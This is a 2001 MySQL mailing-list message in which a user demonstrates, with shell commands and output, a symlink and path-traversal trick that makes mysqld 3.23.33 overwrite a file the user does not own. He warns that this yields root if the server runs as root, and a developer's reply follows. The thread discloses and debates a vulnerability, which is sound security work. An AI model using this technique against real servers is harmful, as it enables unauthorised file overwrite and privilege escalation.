List:General Discussion« Previous MessageNext Message »
From:Sinisa Milivojevic Date:March 21 2001 12:23pm
Subject:Re: FW: potential vulnerability of mysqld running with root privileges
View as plain text  
Benjamin Pflugmann writes:
 > Hi.
 > 
 > On Tue, Mar 20, 2001 at 12:22:19PM +0100, serg@stripped wrote:
 > > Hi!
 > > 
 > > On Mar 20, Basil Hussain wrote:
 > > > Hi all,
 > > > 
 > > > The original message below was posted to the BugTraq mailing list. Have
the
 > > > developers seen this? I know it talks about version mysql-3.20.32a (which
is
 > > > ancient), but he mentions that it affects other versions.
 > > > 
 > > > Anyway, I don't run my MySQL server as root, so I'm not worried. :)
 > > > 
 > > 
 > > You shouldn't.
 > > 
 > > MySQL-3.23 is not vulnerable.
 > 
 > How did you determine that?
 > 
 > 
 > Sorry to contradict, but have a look:
 > 
 > newton:~> mysql -u root -e "select version()"
 > +-----------+
 > | version() |
 > +-----------+
 > | 3.23.33   |
 > +-----------+
 > 8:26:25 newton:~> sudo -u mysql touch /tmp/test # just created a file owned by
mysql-user
 > 8:26:45 newton:~> ln -sf /tmp/test /tmp/yikes.MYI
 > 8:26:54 newton:~> ls -l /tmp
 > [...]
 > -rw-r--r--    1 mysql    mysql           0 Mar 21 08:26 test
 > lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
 > 8:26:57 newton:~> mysql ../../../../tmp -e "create table yikes(w int(4))"
 > 8:27:02 newton:~> ls -l /tmp
 > [...]
 > -rw-r--r--    1 mysql    mysql        1024 Mar 21 08:28 test
 > -rw-rw----    1 mysql    mysql           0 Mar 21 08:28 yikes.MYD
 > lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
 > -rw-rw----    1 mysql    mysql        8548 Mar 21 08:28 yikes.frm
 > 
 > So, I have just overwritten a file not owned by me, namely /tmp/test.
 > If mysql was running as root (which is of couse deprecated), I could
 > overwrite any file in the system this way and even gain root access
 > (as shown by someone on bugtraq), I think.
 > 
 > Did I overlook something?
 > 
 > So, it looks to me, that at least 3.23.33 is not secure in this way (I
 > have not compared 3.23.34 resp. 3.23.35 because for both problems were
 > reported preventing them from use in production systems).
 > 
 > Even without MySQL running as root, I can do a lot of harm (with
 > privilege to create tables, I can probably gain MySQL root privileges,
 > delete any other table, delete configs and log files and so on).
 > 
 > Bye,
 > 
 >         Benjamin.
 > 
 > 

Hi!

Running mysql as root is not safe. 

Next, you had full shell access, with which you can accomplish
practically anything. Just take a look at passwd or shadow file, crack
it and you can have what ever you want. 

Last but not least, there is another matter. CREATE and FILE
privileges also should not be granted lightly.


Regards,

Sinisa

      ____  __     _____   _____  ___     ==  MySQL AB
     /*/\*\/\*\   /*/ \*\ /*/ \*\ |*|     Sinisa Milivojevic
    /*/ /*/ /*/   \*\_   |*|   |*||*|     mailto:sinisa@stripped
   /*/ /*/ /*/\*\/*/  \*\|*|   |*||*|     Larnaca, Cyprus
  /*/     /*/  /*/\*\_/*/ \*\_/*/ |*|____
  ^^^^^^^^^^^^/*/^^^^^^^^^^^\*\^^^^^^^^^^^
             /*/             \*\                Developers Team
Thread
error while loading UDFCurt W. Zirzow29 Mar
  • error while loading UDFMichael Widenius29 Mar
  • Re: FW: potential vulnerability of mysqld running with root privilegesSergei Golubchik21 Mar
  • Re: FW: potential vulnerability of mysqld running with root privilegesSinisa Milivojevic21 Mar
  • Re: FW: potential vulnerability of mysqld running with root privilegesFred van Engen22 Mar
Re: error while loading UDFCurt W. Zirzow30 Mar
Re: error while loading UDFMichael Widenius30 Mar
Re: FW: potential vulnerability of mysqld running with root privileges( )21 Mar
Re: FW: potential vulnerability of mysqld running with root privilegesUnknown Sender21 Mar